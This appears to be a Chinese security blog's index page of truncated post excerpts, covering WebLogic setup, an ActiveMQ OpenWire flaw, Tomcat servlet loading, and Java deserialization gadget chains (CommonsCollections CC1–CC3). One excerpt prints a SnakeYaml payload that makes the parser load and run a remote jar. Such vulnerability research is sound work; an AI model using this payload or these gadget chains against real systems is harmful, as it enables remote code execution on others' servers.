摘要： weblogic 12.2.1.4.0安装 我的环境：ubuntu 22.04 + weblogic 12.2.1.4.0 + jdk8(注：weblogic不支持OpenJDK) jdk下载安装：https://www.oracle.com/cn/java/technologies/downloa 阅读全文

摘要： 一、漏洞触发点 org.apache.activemq.openwire.v12包下BaseDataStreamMarshaller类的createThrowable方法。 package org.apache.activemq.openwire.v12; BaseDataStreamMarshal 阅读全文

摘要： 这几天遇到基于海光服务器的银河麒麟V10 SP2版本操作系统出现内存无故增长问题。 排查发现auditd服务，占用了大量内存。 我的环境是银河麒麟V10 SP2 524，audit版本audit-3.0-5.se.06 ==5037== HEAP SUMMARY: ==5037== in use a 阅读全文

摘要： idea调试的时候加入源代码 ```markdown org.apache.tomcat tomcat-catalina 8.5.81 provided ``` Servlet、Listener、Filter 由 `javax.servlet.ServletContext` 去加载，无论是使用 xm 阅读全文

摘要： SnakeYaml的常见出网利用方式： !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:9000/yaml-payload.jar"] ]] ] 不 阅读全文

摘要： 阅读全文

摘要： 在最后一步的实现上，cc2和cc3一样，最终都是通过TemplatesImpl恶意字节码文件动态加载方式实现反序列化。 已知的TemplatesImpl->newTransformer()是最终要执行的。 TemplatesImpl类动态加载方式的实现分析见ysoserial CommonsColl 阅读全文

摘要： cc3利用链如下： TrAXFilter(Templates templates) TemplatesImpl->newTransformer() TemplatesImpl->getTransletInstance() _class[_transletIndex].newInstance(); 一 阅读全文

摘要： 利用链如下： 其中LazyMap.get()->ChainedTransformer.transform()-InvokerTransformer.transform()与CC1链一致。 /* Gadget chain: java.io.ObjectInputStream.readObject() 阅读全文

摘要： /* Gadget chain: ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke() La 阅读全文